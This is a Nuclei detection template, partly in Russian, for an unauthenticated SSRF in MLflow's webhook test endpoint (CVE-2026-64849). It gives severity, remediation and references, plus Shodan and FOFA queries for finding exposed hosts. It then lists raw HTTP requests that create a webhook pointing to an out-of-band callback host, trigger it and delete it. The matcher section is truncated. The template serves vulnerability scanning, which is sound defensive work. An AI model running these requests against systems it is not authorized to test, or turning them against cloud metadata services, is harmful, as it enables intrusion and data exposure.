
Обнаруживает неаутентифицированный SSRF через вебхуки MLflow (CVE-2026-64849), который получает доступ к внутренним или облачным сервисам метаданных и раскрывает детали ответа с помощью обхода редиректов.
id: CVE-2026-64849
info: name: SSRF в webhook MLflow — неаутентифицированное полное чтение через обход редиректа author: DhiyaneshDk severity: critical description: | MLflow > 3.15.0 содержит уязвимость раскрытия информации, вызванную некорректной проверкой URL-адресов webhook, что позволяет злоумышленникам обращаться к внутренним сервисам или облачным сервисам метаданных и получать детали ответа; для эксплуатации требуется неаутентифицированный доступ к тестовой конечной точке webhook. impact: | Злоумышленники могут обращаться к внутренним сервисам или облачным сервисам метаданных и получать статус и тело ответа, что потенциально раскрывает конфиденциальную информацию. remediation: | Обновите MLflow до версии, содержащей PR #24258, который добавляет SSRFProtectedHTTPAdapter для проверки IP-адресов во время подключения, охватывающей цели редиректов и DNS-rebinding. reference: - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j - https://github.com/mlflow/mlflow/pull/24258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2026-64849 epss-score: 0.00349 epss-percentile: 0.27929 cwe-id: CWE-918 metadata: max-request: 3 verified: true shodan-query: http.title:"MLflow" fofa-query: title="MLflow" tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev
variables: random: "{{rand_text_alpha(8)}}"
http:
raw:
| POST /api/2.0/mlflow/webhooks HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}
| POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}
| DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers:
type: word part: body_1 words:
type: word part: interactsh_protocol words:
extractors: